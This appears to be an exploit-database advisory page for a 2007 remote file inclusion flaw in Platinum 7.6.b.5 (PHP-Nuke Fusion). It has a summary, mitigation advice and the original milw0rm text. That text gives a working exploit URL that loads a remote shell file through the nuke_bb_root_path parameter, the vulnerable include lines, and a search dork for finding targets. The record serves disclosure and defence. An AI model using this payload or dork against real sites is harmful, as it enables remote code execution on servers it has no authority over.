header-logo
Suggest Exploit
vendor:
Platinum
by:
BiNgZa AKA RaZor
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Platinum
Affected Version From: Platinum 7.6.b.5
Affected Version To: Platinum 7.6.b.5
Patch Exists: NO
Related CWE:
CPE: a:phpnuke:platinum:7.6.b.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Inclusion in Platinum 7.6.b.5 Php_Nuke_Fusion

The vulnerability allows an attacker to include a remote file in the application, which can lead to remote code execution or other malicious activities.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization techniques. Additionally, disabling the 'register_globals' setting can help prevent this type of vulnerability.
Source

Exploit-DB raw data:

----------------------------------------------
GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To
----------------------------------------------
 A2J, Chucks, The Pitbull, ICQBomber, str0ke
----------------------------------------------
BiG sHoUt OuT tO udplink.net & ascnet.biz :)
----------------------------------------------



Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
Lines:

----------------------------------------------
$phpbb_root_path = 'modules/Forums/';
include($nuke_bb_root_path . 'extension.inc');
include($nuke_bb_root_path . 'common.'.$phpEx);

----------------------------------------------

----------------------------------------------
FoUnD By BiNgZa AKA RaZor
----------------------------------------------
DoRk:Powered by Platinum 7.6.b.5
----------------------------------------------
shadowcrew@hotmail.co.uk
----------------------------------------------
shadow.php0h.com
----------------------------------------------

# milw0rm.com [2007-10-23]

Navigation

Suggest Exploit

Services By CQR